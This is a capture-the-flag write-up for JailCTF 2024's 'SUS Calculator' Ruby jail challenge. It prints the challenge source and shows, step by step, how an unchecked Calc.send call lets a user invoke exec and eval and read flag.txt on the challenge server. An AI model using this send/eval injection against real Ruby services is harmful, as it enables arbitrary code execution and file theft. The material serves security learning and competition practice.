MisTrale Write UpMisTrale Write Up
Buy me a coffee โ˜•
  • English
  • Franรงais
GitHub
Buy me a coffee โ˜•
  • English
  • Franรงais
GitHub
    • ๐Ÿ Introduction
    • ๐ŸŒŸ Acknowledgments
  • ๐Ÿ’€ Root-Me 20k

    • ๐Ÿ’€ Root Me - 20k
    • โค๏ธ Bash - Love Me
    • ๐Ÿ›‘ Python - Not This Way
    • ๐Ÿ“š NodeJs - Never Trust Node One
  • โ›“๏ธ JailCTF-2024

    • ๐Ÿ‘ฎ JailCTF - 2024
    • ๐Ÿ”  !Alphabeat
    • ๐Ÿง‘โ€๐Ÿฆฏ Blind Calc
    • ๐ŸŽ‰ Parity 1
    • ๐ŸŽˆ Parity 2
    • ๐Ÿช„ Pickle Magic
    • โ˜Ž๏ธ Get and Call
    • โ‰๏ธ No Sense
    • ๐ŸŸฉ Filter'd
    • ๐Ÿง SUS Calculator
  • ๐Ÿ•น๏ธ TCP1P

    • ๐ŸŽฎ Another Discord
  • ๐Ÿงฎ GCC-2024

    • ๐Ÿ˜… soBusy
  • ๐ŸŒ› Midnight

    • ๐ŸŒƒ Midnight
    • โœจ Privesc - 1
    • ๐Ÿ”‘ Privesc - 2
    • ๐Ÿ‘‘ Privesc - 3
    • ๐ŸŽญ My Face

๐Ÿง SUS Calculator

๐Ÿ‘€ Before you start

You can donate to me via Buy Me a Coffee or follow me on Github

๐Ÿ“– Challenge Statement

#!/usr/local/bin/ruby

class Calc
  def self.+ left, right
    left = left.to_i if left.is_a? String
    right = right.to_i if right.is_a? String

    return left + right
  end

  def self.- left, right
    left = left.to_i if left.is_a? String
    right = right.to_i if right.is_a? String

    return left - right
  end

  def self.* left, right
    left = left.to_i if left.is_a? String
    right = right.to_i if right.is_a? String

    return left * right
  end

  def self./ left, right
    left = left.to_i if left.is_a? String
    right = right.to_i if right.is_a? String

    return left / right
  end

  def self.% left, right
    left = left.to_i if left.is_a? String
    right = right.to_i if right.is_a? String

    return left % right
  end
end

STDOUT.sync = true
puts <<~HEADER
  SUS Calculator (Super Ultra Safe Calculator)
  I heard using eval for these calculator apps is bad, so I made sure to avoid it
  Good luck doing anything malicious here >:)

HEADER

loop do
  print "> "
  cmd = gets.chomp.split

  if cmd.size != 3
    puts "Usage: num (+|-|*|/|%) num"
    next
  end

  left, op, right = cmd
  puts Calc.send(op.to_sym, left, right)
end

๐Ÿšฉ Getting the Flag

Letโ€™s begin by analyzing the script:

  • We have a calculator performing basic operations.
  • The operations are executed using class methods.

At first glance, there doesn't seem to be any vulnerability. We can't inject code, and the operations are well-secured.

However, upon reflection, we realize that op, which is supposed to be the operator, is used to call a class method. What if we provided a method name that doesn't exist?

$ ruby chal.rb 
SUS Calculator (Super Ultra Safe Calculator)
I heard using eval for these calculator apps is bad, so I made sure to avoid it
Good luck doing anything malicious here >:)

> 1 + 1
2
> a a a
chal.rb:57:in `block in <main>': undefined method `a' for Calc:Class (NoMethodError)
        from chal.rb:47:in `loop'
        from chal.rb:47:in `<main>'

Now, we need to find a method that exists in the Calc class but isnโ€™t used in the script.

That's when I found the send method, which allows us to call a class method by passing its name as a parameter.

$ ruby chal.rb
SUS Calculator (Super Ultra Safe Calculator)
I heard using eval for these calculator apps is bad, so I made sure to avoid it
Good luck doing anything malicious here >:)

> exec send a
chal.rb:57:in `exec': No such file or directory - a (Errno::ENOENT)
        from chal.rb:57:in `block in <main>'
        from chal.rb:47:in `loop'
        from chal.rb:47:in `<main>'

We have a very good command injection vulnerability. Now we just need to execute our command to read the flag.txt file.

$ ruby chal.rb
SUS Calculator (Super Ultra Safe Calculator)
I heard using eval for these calculator apps is bad, so I made sure to avoid it
Good luck doing anything malicious here >:)

> exec send flag.txt
chal.rb:57:in `exec': No such file or directory - flag.txt (Errno::ENOENT)
        from chal.rb:57:in `block in <main>'
        from chal.rb:47:in `loop'
        from chal.rb:47:in `<main>'

Well, thatโ€™s unfortunate... what is this error ???? Let's try something else.

$ ruby chal.rb
SUS Calculator (Super Ultra Safe Calculator)
I heard using eval for these calculator apps is bad, so I made sure to avoid it
Good luck doing anything malicious here >:)

> exec send ./flag.txt
./flag.txt: 1: jail{flag_will_be_here_on_remote}: not found

Letโ€™s try running this remotely:

$ nc challs1.pyjail.club 5456

SUS Calculator (Super Ultra Safe Calculator)
I heard using eval for these calculator apps is bad, so I made sure to avoid it
Good luck doing anything malicious here >:)

> exec send ./flag.txt
/app/run:57:in `exec': Permission denied - ./flag.txt (Errno::EACCES)
        from /app/run:57:in `block in <main>'
        from <internal:kernel>:187:in `loop'
        from /app/run:47:in `<main>'

Well, it seems we need to try something else. Now, letโ€™s attempt to read the file using eval.

$ nc challs1.pyjail.club 5456
SUS Calculator (Super Ultra Safe Calculator)
I heard using eval for these calculator apps is bad, so I made sure to avoid it
Good luck doing anything malicious here >:)

> eval send File.read("flag.txt")
jail{me_when_i_uhhh_escape}

And there you have it, the flag !

๐Ÿ’– Support

๐Ÿ‘€ Before you leave

You can donate to me via Buy Me a Coffee or follow me on Github

Prev
๐ŸŸฉ Filter'd